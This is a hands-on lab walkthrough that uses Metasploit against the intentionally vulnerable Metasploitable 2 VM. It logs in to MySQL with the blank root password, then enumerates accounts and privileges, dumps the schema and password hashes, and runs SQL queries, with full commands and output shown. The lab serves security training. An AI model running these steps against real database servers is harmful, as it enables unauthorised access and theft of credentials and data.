MySQL / MariaDB Default Credentials (MySQL Protocol)

MySQL / MariaDB Default Credentials (MySQL Protocol)

Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Note 2: this exploit may not work on more recent versions of the Metasploit Framework.

Requirements

Kali Linux	The Kali Linux VM (or any other type of installation)
Metaploitable 2	The Metasploitable 2 VM
Metasploitable Framework	Metasploit Framework toolset (installed on Kali Linux by default)
Metasploitable 2 IP	The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.

Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

1. Launch the Metasploit Framework

msfconsole

2. Search for the appropriate module

search mysql_login

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  auxiliary/scanner/mysql/mysql_login                   normal  No     MySQL Login Utility

3. Use the module

use auxiliary/scanner/mysql/mysql_login

4. Check the module options

options

Module options (auxiliary/scanner/mysql/mysql_login):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   BLANK_PASSWORDS   true             no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false            no        Add all passwords in the current database to the list
   DB_ALL_USERS      false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   PASSWORD                           no        A specific password to authenticate with
   PASS_FILE                          no        File containing passwords, one per line
   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             3306             yes       The target port (TCP)
   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host
   THREADS           1                yes       The number of concurrent threads (max one per host)
   USERNAME          root             no        A specific username to authenticate as
   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false            no        Try the username as the password for all users
   USER_FILE                          no        File containing usernames, one per line
   VERBOSE           true             yes       Whether to print output for all attempts

5. Set the appropriate options

set RHOSTS 192.168.8.142

RHOSTS => 192.168.8.142

6. Run the exploit

run

[+] 192.168.8.142:3306    - 192.168.8.142:3306 - Found remote MySQL version 5.0.51a
[+] 192.168.8.142:3306    - 192.168.8.142:3306 - Success: 'root:'
[*] 192.168.8.142:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

7. Run MySQL enumerator to get info from database server

This will enable the collection from the database.

use auxiliary/admin/mysql/mysql_enum

options

Module options (auxiliary/admin/mysql/mysql_enum):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306             yes       The target port (TCP)
   USERNAME                   no        The username to authenticate as

set RHOSTS 192.168.8.142

RHOSTS => 192.168.8.142

set USERNAME root

USERNAME => root

run

[*] Running module against 192.168.8.142

[*] 192.168.8.142:3306 - Running MySQL Enumerator...
[*] 192.168.8.142:3306 - Enumerating Parameters
[*] 192.168.8.142:3306 -        MySQL Version: 5.0.51a-3ubuntu5
[*] 192.168.8.142:3306 -        Compiled for the following OS: debian-linux-gnu
[*] 192.168.8.142:3306 -        Architecture: i486
[*] 192.168.8.142:3306 -        Server Hostname: metasploitable
[*] 192.168.8.142:3306 -        Data Directory: /var/lib/mysql/
[*] 192.168.8.142:3306 -        Logging of queries and logins: OFF
[*] 192.168.8.142:3306 -        Old Password Hashing Algorithm OFF
[*] 192.168.8.142:3306 -        Loading of local files: ON
[*] 192.168.8.142:3306 -        Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.8.142:3306 -        Allow Use of symlinks for Database Files: YES
[*] 192.168.8.142:3306 -        Allow Table Merge: YES
[*] 192.168.8.142:3306 -        SSL Connections: Enabled
[*] 192.168.8.142:3306 -        SSL CA Certificate: /etc/mysql/cacert.pem
[*] 192.168.8.142:3306 -        SSL Key: /etc/mysql/server-key.pem
[*] 192.168.8.142:3306 -        SSL Certificate: /etc/mysql/server-cert.pem
[*] 192.168.8.142:3306 - Enumerating Accounts:
[*] 192.168.8.142:3306 -        List of Accounts with Password Hashes:
[+] 192.168.8.142:3306 -                User: debian-sys-maint Host:  Password Hash: 
[+] 192.168.8.142:3306 -                User: root Host: % Password Hash: 
[+] 192.168.8.142:3306 -                User: guest Host: % Password Hash: 
[*] 192.168.8.142:3306 -        The following users have GRANT Privilege:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following users have CREATE USER Privilege:
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following users have RELOAD Privilege:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following users have SHUTDOWN Privilege:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following users have SUPER Privilege:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following users have FILE Privilege:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following users have PROCESS Privilege:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following accounts have privileges to the mysql database:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following accounts have empty passwords:
[*] 192.168.8.142:3306 -                User: debian-sys-maint Host: 
[*] 192.168.8.142:3306 -                User: root Host: %
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -        The following accounts are not restricted by source:
[*] 192.168.8.142:3306 -                User: guest Host: %
[*] 192.168.8.142:3306 -                User: root Host: %
[*] Auxiliary module execution completed

8. Dump database schema

This will access and dump the database schema.

use auxiliary/scanner/mysql/mysql_schemadump

options

Module options (auxiliary/scanner/mysql/mysql_schemadump):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   DISPLAY_RESULTS  true             yes       Display the Results to the Screen
   PASSWORD                          no        The password for the specified username
   RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT            3306             yes       The target port (TCP)
   THREADS          1                yes       The number of concurrent threads (max one per host)
   USERNAME                          no        The username to authenticate as

set USERNAME root

set RHOSTS 192.168.8.142

run

[+] 192.168.8.142:3306    - Schema stored in: /home/kali/.msf4/loot/20230328173413_default_192.168.8.142_mysql_schema_505584.txt
[+] 192.168.8.142:3306    - MySQL Server Schema 
 Host: 192.168.8.142 
 Port: 3306 
 ====================

---
- DBName: dvwa
  Tables:
  - TableName: guestbook
    Columns:
    - ColumnName: comment_id
      ColumnType: smallint(5) unsigned
    - ColumnName: comment
      ColumnType: varchar(300)
    - ColumnName: name
      ColumnType: varchar(100)
  - TableName: users
    Columns:
    - ColumnName: user_id
      ColumnType: int(6)
    - ColumnName: first_name
      ColumnType: varchar(15)
    - ColumnName: last_name
      ColumnType: varchar(15)
    - ColumnName: user
      ColumnType: varchar(15)
    - ColumnName: password
      ColumnType: varchar(32)
    - ColumnName: avatar
      ColumnType: varchar(70)
- DBName: metasploit
  Tables: []
- DBName: owasp10
  Tables:
  - TableName: accounts
    Columns:
    - ColumnName: cid
      ColumnType: int(11)
    - ColumnName: username
      ColumnType: text
    - ColumnName: password
      ColumnType: text
    - ColumnName: mysignature
      ColumnType: text
    - ColumnName: is_admin
      ColumnType: varchar(5)
  - TableName: blogs_table
    Columns:
    - ColumnName: cid
      ColumnType: int(11)
    - ColumnName: blogger_name
      ColumnType: text
    - ColumnName: comment
      ColumnType: text
    - ColumnName: date
      ColumnType: datetime
  - TableName: captured_data

9. Get MySQL password hashes

Try to obtain additional password hashes on the database.

use auxiliary/scanner/mysql/mysql_hashdump

options

Module options (auxiliary/scanner/mysql/mysql_hashdump):                                                                                                                 
                                                                                                                                                                         
   Name      Current Setting  Required  Description                                                                                                                      
   ----      ---------------  --------  -----------                                                                                                                      
   PASSWORD                   no        The password for the specified username                                                                                          
   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html                           
   RPORT     3306             yes       The target port (TCP)                                                                                                            
   THREADS   1                yes       The number of concurrent threads (max one per host)                                                                              
   USERNAME                   no        The username to authenticate as

set USERNAME root

set RHOSTS 192.168.8.142

run

[+] 192.168.8.142:3306    - Saving HashString as Loot: debian-sys-maint:                                                                                                 
[+] 192.168.8.142:3306    - Saving HashString as Loot: root:
[+] 192.168.8.142:3306    - Saving HashString as Loot: guest:
[*] 192.168.8.142:3306    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

10. Run MySQL queries

Try to run SQL queries on the database.

use auxiliary/admin/mysql/mysql_sql

options

Module options (auxiliary/admin/mysql/mysql_sql):

   Name      Current Setting   Required  Description
   ----      ---------------   --------  -----------
   PASSWORD                    no        The password for the specified username
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT     3306              yes       The target port (TCP)
   SQL       select version()  yes       The SQL to execute.
   USERNAME                    no        The username to authenticate as

set USERNAME root

set RHOSTS 192.168.8.142

run

[*] Running module against 192.168.8.142

[*] 192.168.8.142:3306 - Sending statement: 'select version()'...
[*] 192.168.8.142:3306 -  | 5.0.51a-3ubuntu5 |
[*] Auxiliary module execution completed

set SQL show databases

run

[*] Running module against 192.168.8.142

[*] 192.168.8.142:3306 - Sending statement: 'show databases'...
[*] 192.168.8.142:3306 -  | information_schema |
[*] 192.168.8.142:3306 -  | dvwa |
[*] 192.168.8.142:3306 -  | metasploit |
[*] 192.168.8.142:3306 -  | mysql |
[*] 192.168.8.142:3306 -  | owasp10 |
[*] 192.168.8.142:3306 -  | tikiwiki |
[*] 192.168.8.142:3306 -  | tikiwiki195 |
[*] Auxiliary module execution completed

Video

Video that resumes everything on this laboratory.

Questions

Now that you have completed this exploitation try to answer to following:

1. Now, what can I do with the exploitation achieved?

2. Which type of privileges do I have on the exploited target?

3. How was this accomplished?

4. Try to learn more about this vulnerability.